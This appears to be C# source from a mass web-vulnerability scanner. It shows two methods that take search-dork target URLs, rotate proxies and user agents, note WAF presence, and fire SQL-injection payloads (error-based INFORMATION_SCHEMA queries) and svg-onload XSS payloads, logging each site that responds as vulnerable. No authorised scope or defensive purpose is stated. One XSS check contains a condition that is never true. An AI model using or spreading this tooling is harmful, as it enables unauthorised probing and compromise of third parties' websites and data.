public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null) { transActions++; try { List <string> sqlpayloads = new List <string>() { "'", ".(('\".,,,,", "AND 7786=7473-- FNiT", "\"(().()('.", "'YgxvMp<'\">AqklPj", "') AND 7648=7021 AND ('vhCh'='vhCh", " AND (SELECT 5232 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(5232=5232,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FeKK", " AND 2229 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2229=2229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(113)))" }; string userAgent = Leaf.xNet.Http.RandomUserAgent(); bool waf = false; if (wafProtection(dork)) { waf = true; } Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest() { IgnoreProtocolErrors = true, AllowAutoRedirect = false, Cookies = new CookieStorage(false), ConnectTimeout = helperObejct.timeOut * 1000, ReadWriteTimeout = helperObejct.timeOut * 1000, KeepAlive = false, UserAgent = userAgent }; string baseSource = ""; foreach (string item in sqlpayloads) { if (NeedProxy) { helperObejct.setProxy(ref req, proxy); } List <string> urls = helperObejct.insertPayload(dork, item); foreach (string urlChecking in urls) { if (urlChecking == "itsnotInjectAble") { transActions--; return(bruteResult.unvulnerAble); } else { if (baseSource.Length <= 0) { baseSource = req.Get(dork).ToString(); } req.Get(urlChecking); string source = req.Response.ToString().ToLower(); List <string> targetBugs = new List <string>() { "warning: mysql_connect()", "warning: mysql_fetch_row()", "error in your sql syntax", "warning: mysql_result()", "mysql_num_rows()", "mysql_fetch_assoc()", "mysql_fetch_row()", "mysql_numrows()", "mysql_fetch_object()", "MySQL Driver", "MySQL ODBC", "MySQL Error", "error in your SQL syntax" }; foreach (string ite in targetBugs) { if (source.Contains(ite.ToLower()) && baseSource.Contains(ite) == false) { transActions--; try { string url = dork; helperObejct.mainFormObject.Dispatcher.Invoke(() => { itsABug bug = new itsABug() { id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(), url = url, vulnerability = "sql", WAF = waf.ToString(), payload = item }; helperObejct.mainFormObject.vulnerableUrlsList.Add(bug); helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList; helperObejct.mainFormObject.resultView.Items.Refresh(); }); dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}"; } catch { } return(bruteResult.sql); } } } } } transActions--; return(bruteResult.unvulnerAble); } catch { transActions--; return(bruteResult.unvulnerAble); } }
public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null) { transActions++; try { bool waf = false; if (wafProtection(dork)) { waf = true; } string first = randomText(3); string sec = randomText(3); string finalpayloadTest = "'" + first + "<'\">" + sec + ""; string finalpayloadCheck = "" + first + "<'\">" + sec + ""; string finalpayloadCheck2 = $@"{first}<\'\"">{sec}"; List <string> xsspayloads = new List <string>() { finalpayloadTest, "%27%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb", "%22%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb", "PH09NIXPY74X%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb", }; List <string> containsList = new List <string>() { finalpayloadCheck2, finalpayloadCheck }; string userAgent = Leaf.xNet.Http.RandomUserAgent(); string sourceBase = ""; foreach (string item in xsspayloads) { List <string> urls = helperObejct.insertPayload(dork, item); foreach (string urlNew in urls) { if (urlNew == "itsnotInjectAble") { transActions--; return(bruteResult.unvulnerAble); } else { Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest() { IgnoreProtocolErrors = true, AllowAutoRedirect = true, Cookies = new CookieStorage(false), ConnectTimeout = helperObejct.timeOut * 1000, ReadWriteTimeout = helperObejct.timeOut * 1000, KeepAlive = false, UserAgent = userAgent }; if (sourceBase.Length <= 0) { sourceBase = req.Get(dork).ToString(); } string source = req.Get(urlNew).ToString(); Regex rx = new Regex("PH09NIXPY74X<svg|" + finalpayloadCheck + "|" + finalpayloadCheck2); if (rx.IsMatch(source) && rx.IsMatch(sourceBase) == false) { transActions--; try { string url = dork; helperObejct.mainFormObject.Dispatcher.Invoke(() => { itsABug bug = new itsABug() { id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(), url = url, vulnerability = "xss", WAF = waf.ToString(), payload = item }; helperObejct.mainFormObject.vulnerableUrlsList.Add(bug); helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList; helperObejct.mainFormObject.resultView.Items.Refresh(); }); dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}"; } catch { } return(bruteResult.xss); } else { foreach (var STR in containsList) { if (source.Contains(STR) && source.Contains(STR) == false) { transActions--; try { string url = dork; helperObejct.mainFormObject.Dispatcher.Invoke(() => { itsABug bug = new itsABug() { id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(), url = url, vulnerability = "xss", WAF = waf.ToString(), payload = item }; helperObejct.mainFormObject.vulnerableUrlsList.Add(bug); helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList; helperObejct.mainFormObject.resultView.Items.Refresh(); }); dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}"; } catch { } return(bruteResult.xss); } } } } } } transActions--; return(bruteResult.unvulnerAble); } catch { transActions--; return(bruteResult.unvulnerAble); } }